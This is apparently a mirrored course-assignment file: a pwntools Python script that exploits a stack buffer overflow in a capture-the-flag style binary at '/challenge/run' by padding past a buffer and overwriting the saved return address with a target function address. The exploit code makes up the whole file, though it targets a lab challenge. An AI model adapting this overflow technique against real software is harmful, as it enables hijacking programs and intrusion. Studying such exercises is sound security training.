mirror of
https://github.com/20kaushik02/CSE545_SS_Work.git
synced 2025-12-06 10:44:06 +00:00
47 lines
1.2 KiB
Python
47 lines
1.2 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
# This exploit template was generated via:
|
|
# $ pwn template
|
|
from pwn import *
|
|
|
|
# Set up pwntools for the correct architecture
|
|
# context.update(arch='i386')
|
|
exe = '/challenge/run'
|
|
|
|
# Many built-in settings can be controlled on the command-line and show up
|
|
# in "args". For example, to dump all data sent/received, and disable ASLR
|
|
# for all created processes...
|
|
# ./exploit.py DEBUG NOASLR
|
|
|
|
|
|
|
|
def start(argv=[], *a, **kw):
|
|
'''Start the exploit against the target.'''
|
|
if args.GDB:
|
|
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
|
|
else:
|
|
return process([exe] + argv, *a, **kw)
|
|
|
|
# Specify your GDB script here for debugging
|
|
# GDB will be launched if the exploit is run via e.g.
|
|
# ./exploit.py GDB
|
|
gdbscript = '''
|
|
continue
|
|
'''.format(**locals())
|
|
|
|
#===========================================================
|
|
# EXPLOIT GOES HERE
|
|
#===========================================================
|
|
|
|
io = start()
|
|
|
|
unbound_buffer = 0x7ffd6f3ab780
|
|
saved_rip = 0x7ffd6f3ab7c8
|
|
offset = saved_rip-unbound_buffer
|
|
|
|
target_fn = 0x401166
|
|
payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
|
|
|
|
io.send(payload)
|
|
io.interactive()
|